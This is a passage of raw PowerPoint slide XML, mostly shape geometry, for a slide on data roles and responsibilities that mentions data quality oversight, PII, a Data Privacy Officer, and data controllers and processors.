                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188798" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152435" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119205" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89413" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63366" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41370" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23729" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10750" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2738" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="406907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941689" y="6073292"/>
            <a:ext cx="5493385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45030" marR="5080" indent="-2132965">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Take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he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spon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ib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da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qua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ity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 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oversight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457943" y="4602479"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246371" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246371" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246371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0785475" y="4900041"/>
            <a:ext cx="175704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stewa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1779" y="306451"/>
            <a:ext cx="554990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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Roles</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Responsibilities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35779" y="760476"/>
            <a:ext cx="7703820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8452866" y="2539745"/>
            <a:ext cx="6160135" cy="2441575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="2441575">
                <a:moveTo>
                  <a:pt x="0" y="406907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2736" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10743" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23715" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41347" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63335" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89373" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119157" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152382" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188742" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227933" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269650" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313588" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359442" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406907" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800541" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846379" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5890307" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932018" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5971209" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007572" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6040802" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070594" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096641" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118637" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136278" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149257" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157269" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160007" y="406907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160007" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157269" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149257" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136278" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118637" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096641" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070594" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6040802" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007572" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5971209" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932018" y="2400077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5890307" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846379" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800541" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753099" y="2441448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406907" y="2441448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359442" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313588" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269650" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227933" y="2400077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188742" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152382" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119157" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89373" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63335" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41347" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23715" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10743" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="406907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978645" y="3325519"/>
            <a:ext cx="5158105" cy="1173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4100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Takes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responsibility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oversight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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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company’s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Personally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Identifiable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Information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(PII)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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assets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415271" y="2087879"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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912222" y="2384298"/>
            <a:ext cx="3418204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Privacy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Officer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(DPO)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69002" y="5901690"/>
            <a:ext cx="6162040" cy="2440305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2440304">
                <a:moveTo>
                  <a:pt x="0" y="406654"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2736" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10742" y="313428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23713" y="269527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41342" y="227840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63324" y="188674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89353" y="152334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119126" y="119125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152334" y="89353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188674" y="63324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227840" y="41342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269527" y="23713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313428" y="10742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359239" y="2736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406653" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5754878" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802292" y="2736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5848103" y="10742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5892004" y="23713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5933691" y="41342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972857" y="63324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6009197" y="89353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6042406" y="119125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072178" y="152334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098207" y="188674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120189" y="227840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137818" y="269527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150789" y="313428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158795" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="406654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="2033257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158795" y="2080683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150789" y="2126503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137818" y="2170410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120189" y="2212100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098207" y="2251268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072178" y="2287608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6042406" y="2320815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6009197" y="2350585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972857" y="2376611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5933691" y="2398590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5892004" y="2416216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5848103" y="2429183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802292" y="2437188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5754878" y="2439924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406653" y="2439924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359239" y="2437188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313428" y="2429183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269527" y="2416216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227840" y="2398590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188674" y="2376611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152334" y="2350585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119126" y="2320815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89353" y="2287608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63324" y="2251268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41342" y="2212100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23713" y="2170410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10742" y="2126503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736" y="2080683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2033257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="406654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339841" y="6687083"/>
            <a:ext cx="5469890" cy="1173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-1270">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Comprise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data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controllers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 data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processors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decide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how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should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managed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914644" y="5408676"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247896" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896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140958" y="5465555"/>
            <a:ext cx="3961765" cy="79184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75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Organizational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les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privacy</a:t>
            </a:r>
            <a:endParaRPr sz="2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dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>legislation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858517" y="2539745"/>
            <a:ext cx="6162040" cy="2441575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2441575">
                <a:moveTo>
                  <a:pt x="0" y="406907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10750" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23729" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41370" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63366" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89413" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119205" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152435" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188798" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227989" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269700" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313628" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359466" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406907" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5754624" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802065" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5847903" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891831" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5933542" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972733" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6009096" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6042326" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072118" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098165" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120161" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137802" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150781" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158793" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="406907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158793" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150781" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137802" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120161" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098165" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072118" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6042326" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6009096" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972733" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5933542" y="2400077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891831" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5847903" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802065" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5754624" y="2441448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406907" y="2441448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359466" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313628" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269700" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227989" y="2400077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188798" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152435" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119205" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89413" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63366" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41370" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23729" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10750" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2738" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="406907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721101" y="3516528"/>
            <a:ext cx="4484370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74775" marR="5080" indent="-1362710">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Take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fo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mati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sy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ms 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management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820923" y="2087879"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247896" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164083" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="984504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164084"/>
                </a:lnTo>
                <a:lnTo>
